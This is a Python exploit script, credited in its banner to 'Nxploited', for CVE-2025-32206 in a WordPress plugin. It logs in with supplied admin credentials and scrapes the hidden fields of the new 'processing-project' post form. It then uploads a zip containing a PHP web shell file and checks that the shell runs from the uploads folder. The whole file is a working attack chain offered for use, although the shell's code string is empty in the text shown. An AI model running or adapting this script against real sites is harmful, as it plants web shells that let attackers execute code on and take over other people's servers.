import requests from bs4 import BeautifulSoup import zipfile import argparse import os import urllib3 # Banner print(""" @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@@ @@! @@@@ !@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ @!@ !@! @!@!@ !@! !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@ !!@ @!@ @! !@! !!@@!@! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !!: !!: !@!!! !!! @!!@!!!! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !:! !:! !!:! !!! !:! !:! :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: :!: !:! :!: !:! ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: :: ::::: :: ::::: ::::::: :: :::: ::: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : ::: :: : ::: : : : : :: : : Nxploited | Khaled Alenazi """) urllib3.disable_warnings() def create_shell_zip(zip_name="Nxploited.zip", shell_name="Nxploit.php"): shell_code = "" with zipfile.ZipFile(zip_name, 'w') as z: z.writestr(shell_name, shell_code) print(f"[+] Created zip with shell: {zip_name} -> {shell_name}") return zip_name, shell_name def login(session, url, username, password): login_data = { "log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In", "redirect_to": f"{url}/wp-admin/", "testcookie": "1" } response = session.post(f"{url}/wp-login.php", data=login_data) if 'wordpress_logged_in' in str(session.cookies): print("[+] Logged in successfully.") return True else: print("[-] Login failed.") return False def extract_form_data(session, new_post_url): response = session.get(new_post_url) soup = BeautifulSoup(response.text, "html.parser") hidden_inputs = soup.find_all("input", {"type": "hidden"}) data = {tag.get("name"): tag.get("value") for tag in hidden_inputs if tag.get("name")} data.update({ "post_title": "Shell Upload Test", "publish": "Publish" }) print("[+] Extracted form fields successfully.") return data def upload_zip(session, url, data, zip_path): with open(zip_path, "rb") as f: files = { "project_zip": (zip_path, f, "application/zip") } response = session.post(f"{url}/wp-admin/post.php", data=data, files=files) if response.status_code == 200: print("[+] Upload request sent successfully.") else: print("[-] Upload failed.") def check_shell(session, shell_url): try: response = session.get(shell_url) if "Shell Executed" in response.text: print(f"[+] Shell executed at: {shell_url}") elif response.status_code == 200: print(f"[?] Shell exists but no output: {shell_url}") else: print("[-] Shell not found.") except Exception as e: print(f"[-] Error checking shell: {e}") def main(): parser = argparse.ArgumentParser(description="Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)") parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g. http://192.168.100.74:888/wordpress)") parser.add_argument("-un", "--username", required=True, help="WordPress admin username") parser.add_argument("-p", "--password", required=True, help="WordPress admin password") args = parser.parse_args() session = requests.Session() session.verify = False session.headers.update({"User-Agent": "Mozilla/5.0"}) zip_file, shell_name = create_shell_zip() if not login(session, args.url, args.username, args.password): return new_post_url = f"{args.url}/wp-admin/post-new.php?post_type=processing-project" form_data = extract_form_data(session, new_post_url) upload_zip(session, args.url, form_data, zip_file) shell_path = f"{args.url}/wp-content/uploads/processing-projects/{shell_name}" check_shell(session, shell_path) if __name__ == "__main__": main()